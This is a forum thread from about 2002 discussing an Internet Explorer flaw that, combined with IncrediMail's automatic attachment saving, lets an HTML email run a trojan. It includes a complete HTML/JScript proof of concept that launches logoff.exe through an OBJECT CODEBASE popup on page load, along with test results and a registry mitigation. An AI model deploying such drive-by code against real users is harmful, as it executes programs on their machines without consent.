New MSIE Vulnerability - Remote Access

[s0nIc]

A Microsoft Internet Explorer vulnerability was found by GreyMagic
(http://security.greymagic.com/adv/gm001-ie/). With IncrediMail, it's
possible to gain a remote access on a computer.


Incredimail save automatically email attachements in this directory
(on Windows 2000 Professionnal) :
C:Program
FilesIncrediMailDataIdentities{42D00B20-479C-11d4-9706- 00105A40931C}Message
StoreAttachments

So if you send an html email with the GreyMagic vulnerability and a
trojan in attachments, it will be save in this directory.

The html mail contains this code :






]]>




So, the trojan is executed automatically.

[Remote_Access_]

Demonstration:
simple
advanced

Solution: There is no configuration-tweaking workaround for this bug, it will work as long as the browser parses HTML. The only possible solution must come in the form of a patch from Microsoft.
Update - 3 Mar 2002

Since the injected <object> runs in the "My Computer" Zone changing the Internet Zone's settings didn't affect it, but changing the correct zone's settings will prevent this exploit from running.
Here is the registry information:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
Change the value of "1004" (DWORD) to 0x3.

Tested on: IE5.5sp2 Win98, all patches, Active scripting and ActiveX disabled.
IE5.5sp2 NT4 sp6a, all patches, Active scripting and ActiveX disabled.
IE6sp1 Win2000 sp2, all patches, Active scripting and ActiveX disabled.
IE6sp1 WinXP, all patches, Active scripting and ActiveX disabled.

Taken from here.

Remote_Access_

[micael]

A more mean code then the above example.. Once you visit the homepage your computer will loggof the current user.. Norton AV did find and identify the above but did not succed to detect and stop this piece of code .

Source and example of the code can be found here --> http://www.****.org/~max/xp_rules.jpg (beware visiting this webpage can logg you out of the computer).

Code:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE>IE6 security...</TITLE>

<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<SCRIPT language=JScript>

var programName=new Array(
	'c:/windows/system32/logoff.exe',
	'c:/winxp/system32/logoff.exe',
	'c:/winnt/system32/logoff.exe'
);

function Init(){
	var oPopup=window.createPopup();
	var oPopBody=oPopup.document.body;
	var n,html='';
	for(n=0;n<programName.length;n++)
		html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' CODEBASE='"+programName[n]+"' %1='r'></OBJECT>";
	oPopBody.innerHTML=html;
	oPopup.show(290, 390, 200, 200, document.body);
}

</SCRIPT>
</head>
<BODY onload="Init()">
You should feel lucky if you dont have XP right now.
</BODY>
</HTML>

[bucket]

I ran the GreyMagic test on the following:

IE6.0, Win98, all patches, Scriptblocking enabled
IE5.5, sp/2, Win98se, Spriptblocking enabled
IE5.5, sp/1, Win98, Scriptblocking enabled
The code attempted to run in each case but NAV 7.0 (2001) stopped the exploit each time.
BTW, Norton Personal Firewall did *nothing*.

[KublaiKhan]

Kinda goes to show, you really shouldn't integrate a browser with the Operating System so closely. Modularity is security, in this case--visiting a page with any of the above code will not harm Netscape, for instance, because it is not integrated with the operating system.

Of course, none of the above exploits had any effect on Opera 5, for RedHat 7.1 ;-)

[bucket]

KublaiKhan wrote:

"Of course, none of the above exploits had any effect on Opera 5, for RedHat 7.1 ;-)"

Neither of the above exploits had any effect on OffByOne ver.3.2G, Win98. :-)